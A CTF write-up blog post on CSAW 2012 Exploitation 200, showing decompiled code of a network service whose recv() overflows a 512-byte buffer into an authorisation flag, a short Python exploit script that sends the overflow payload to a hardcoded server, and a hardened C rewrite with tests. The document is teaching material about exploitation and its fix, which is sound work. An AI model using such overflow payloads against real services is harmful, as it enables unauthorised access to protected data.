team pong

Dutch CTF "team pong" write-ups and other stuff

CSAW 2012 – Exploitation 200


$ md5sum exp200
979fd4900ef48a1b958d6d555c4c35b5  exp200
$ file exp200
exp200: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x94e984380a61d713c1a614f40eeee92c533593d4, not stripped

Opening the binary in IDA reveals a vulnerable function:

int __cdecl handle(int fd)
{
  char buf[512]; // [sp+1Ch] [bp-20Ch]@1
  int v3; // [sp+21Ch] [bp-Ch]@1  -- sits directly after buf: bp-0x20C + 0x200 = bp-0xC

  v3 = 0;
  memset(buf, 0, sizeof(buf));
  send(fd, "Wecome to my first CS project.\nPlease type your name:  ", 0x37u, 0);
  recv(fd, buf, 516u, 0);                     // up to 516 bytes into a 512-byte buffer: bytes 512..515 land on v3
  buf[511] = 0;                               // terminates buf, but v3 has already been overwritten by then
  if ( !strcmp(buf, "AAAAAAAAAAAAAAAAAAAAAAAAAA\n") )
    v3 = 1;
  if ( v3 )                                   // any non-zero v3 passes, whether set by strcmp or by the overflow
  {
    ::fd = (int)fopen("./key", "r");          // ::fd is a global, not the socket parameter fd
    __isoc99_fscanf(::fd, "%s", buf);
    recv(fd, 0, 0x10u, 64);                   // flags=DONT_WAIT
    send(fd, buf, 0x200u, 0);
  }
  return close(fd);
}

One can choose to send “AAAAAAAAAAAAAAAAAAAAAAAAAA\n” to the server and get the key.

Or do it the hard way and overflow buf and consequently the variable v3: recv() accepts up to 516 bytes into the 512-byte buf, and v3 lies directly after buf on the stack, so the last four bytes of the input become the new value of v3. 🙂

import socket

service_port = 54321
ip = "128.238.66.218"

s = socket.create_connection((ip, service_port))
# 512 bytes of filler reach the end of buf; the next four bytes overwrite v3
# with the little-endian integer 1, so the strcmp() result no longer matters.
buf = b'B' * 512 + b'\x01\x00\x00\x00'
print(s.recv(4096))   # banner: "Wecome to my first CS project. ..."
s.sendall(buf)
print(s.recv(4096))   # contents of ./key, sent back from buf
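For comparison, here is how the decision in handle() would look with the overflow closed. This is an added example, not code from the challenge binary or from the write-up: the socket read is replaced by a (data, len) argument so the logic can be exercised offline, the function and helper names are invented, and the three inputs are constructed here (the second helper builds the write-up's own 'B' * 512 + 01 00 00 00 payload).

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 512
#define NAME_PASSWORD "AAAAAAAAAAAAAAAAAAAAAAAAAA\n"

/* Hardened decision logic for handle() (hypothetical rewrite, not the
 * binary's code). Returns 1 when the key may be sent, 0 otherwise. */
int name_is_authorised(const unsigned char *data, size_t len)
{
    char buf[BUF_SIZE];
    size_t n;

    memset(buf, 0, sizeof(buf));

    /* The binary asks recv() for 516 bytes into a 512-byte buffer, so the
     * tail of a long input lands on the flag that follows buf on the stack.
     * Clamp the copy to the buffer and leave room for the terminating NUL. */
    n = len < sizeof(buf) - 1 ? len : sizeof(buf) - 1;
    memcpy(buf, data, n);
    buf[sizeof(buf) - 1] = '\0';

    /* Decide from the comparison alone: there is no separate writable flag
     * (the binary's v3) for an overflow to set. */
    return strcmp(buf, NAME_PASSWORD) == 0;
}

/* Constructed input 1: the write-up's overflow payload, 512 'B's followed by
 * the little-endian value 1. With the hardened check this must return 0. */
int check_overflow_payload(void)
{
    unsigned char payload[BUF_SIZE + 4];
    memset(payload, 'B', BUF_SIZE);
    payload[BUF_SIZE]     = 0x01;
    payload[BUF_SIZE + 1] = 0x00;
    payload[BUF_SIZE + 2] = 0x00;
    payload[BUF_SIZE + 3] = 0x00;
    return name_is_authorised(payload, sizeof(payload));
}

/* Constructed input 2: the intended name, which must still be accepted. */
int check_correct_name(void)
{
    return name_is_authorised((const unsigned char *)NAME_PASSWORD,
                              strlen(NAME_PASSWORD));
}

/* Constructed input 3: the correct name followed by filler well past the
 * buffer. The binary would accept this (the filler overwrites v3 with a
 * non-zero value); the clamped copy plus a pure strcmp() decision rejects it. */
int check_correct_name_with_trailer(void)
{
    unsigned char payload[BUF_SIZE + 64];
    memset(payload, 'C', sizeof(payload));
    memcpy(payload, NAME_PASSWORD, strlen(NAME_PASSWORD));
    return name_is_authorised(payload, sizeof(payload));
}

int main(void)
{
    printf("overflow payload accepted:      %d\n", check_overflow_payload());
    printf("correct name accepted:          %d\n", check_correct_name());
    printf("correct name + trailer accepted: %d\n",
           check_correct_name_with_trailer());
    return 0;
}
```

The two changes that matter are the length passed to the copy (never larger than the destination minus one) and the removal of the stack-resident flag: a boolean that lives next to an attacker-controlled buffer is only as trustworthy as the bounds checking on that buffer.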

Written by teampong

October 24, 2012 at 5:29 am
